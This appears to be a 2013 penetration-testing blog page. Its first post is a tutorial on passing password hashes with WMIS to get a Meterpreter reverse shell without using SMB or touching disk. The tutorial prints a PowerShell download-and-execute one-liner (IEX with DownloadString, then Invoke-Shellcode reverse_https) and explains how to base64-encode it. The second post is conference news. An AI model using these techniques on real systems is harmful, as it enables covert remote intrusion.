Friday, July 19, 2013

WMIS: The Missing Piece of the Ownage Puzzle

The unsung hero of the PTH-Suite is definitely WMIS. It has replaced several other tools that I previously used to pass the hash. It is essentially the Linux equivalent to WMIC and the "process call create" query. The advantage of WMI over other methods of remote command execution is that it doesn't doesn't rely on SMB and starting a service on the remote host.  In most cases, it flies beneath the radar and it just might be the easiest way to get a shell on a remote host all without writing to the disk.

I recently wrote a post on Pentest Geek about how easy it easy it is to get a Meterpreter shell from a PowerShell console by using Matt Graeber's PowerSploit function Invoke-Shellcode. WMIS with a password hash (or password) is essentially like being able to run a single cmd.exe command at a time. There are lots of ways to turn that type of access into a shell, but few are as easy as this.

The first step is to properly install WMIS as described here. Unfortunately, those steps need to be followed even today for x64 versions of Kali.

Now that we have WMIS installed, we can start our Meterpreter handler. I prefer to use this script to automate the process:

Next, we need to build the PowerShell code we want to execute to get our shell:

IEX (New-Object Net.WebClient).DownloadString(‘’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost –Lport 443 –Force

What this is doing is utilizing Invoke-Expression (aliased to IEX) to execute what is downloaded with the .Net webclient. The Invoke-Shellcode function is being downloaded and ran in memory and we are appending the options we need to get our shell.

Now we need to convert this script block into something that cmd.exe understands. The best way to do that is to base64 encode the scriptblock which can also be accomplished with another simple python script:

You may notice that the script is ensuring we don't pass the length restriction for cmd.exe and encoding the string to little endian Unicode before base64 encoding. PowerShell can be quirky, but a good explanation can be found here.  After running the script we have the command to feed to WMIS:

Now we can run WMIS with the command from the previous script:

Now we wait. It could take up to a few minutes, but eventually we will have our shell:

That is it. We can pass hashes to get a Meterpreter shell without starting a service, uploading a binary or using SMB.  My next post will demonstrate how to automate the entire process and will discuss the release of the latest addition to the PTH-Suite: PowerPTH. Stay tuned.

Join us at Blackhat where we will continue our talk from last year with new PtH-related content including some simple mitigations.  If you are interested in PowerShell uses in pentesting, check out my blog for a list of great resources and sign up for Carlos Perez's PowerShell class at Derbycon.  Speaking of Derbycon, Skip and I will be there too!


Tuesday, July 16, 2013

Long Overdue Updates - Blackhat, Derbycon and more!

Upcoming Conferences

In spite of what the BlackHat USA 2013 page says, Chris and I both will be at BlackHat this year presenting a talk that will hopefully help folks understand 1) the problem of PTH and other credential attacks and 2) give folks some solid ideas on how to defend against it.  We're also releasing some tools to help you guys out...  I'm not going to spoil the fun, but you know that Chris is big into powershell, right? *wink*

Also, and it's not up yet, Chris and I will be heading back to Derbycon this year.  We're really looking forward to it! 

PTH Tools in Kali

I'm not sure if everybody saw, but one of the Kali devs did some pretty neat stuff to incorporate the most of the PTH toolset into Kali.  For those of you who don't know Raphael Hertzog, here's his blog:  He's a regular Debian contributor and I know he spent a fair amount of time working on getting PTH in Kali.  He has a donations page, if you find the PTH toolsuite useful, please consider donating to him via Paypal.  I just did!

Here's the Kali post in case you missed it:

More To Follow...

I plan on trying to make some more time to post on the blog related to PTH and a series of posts on defense as well.  We'll see how that turns out :/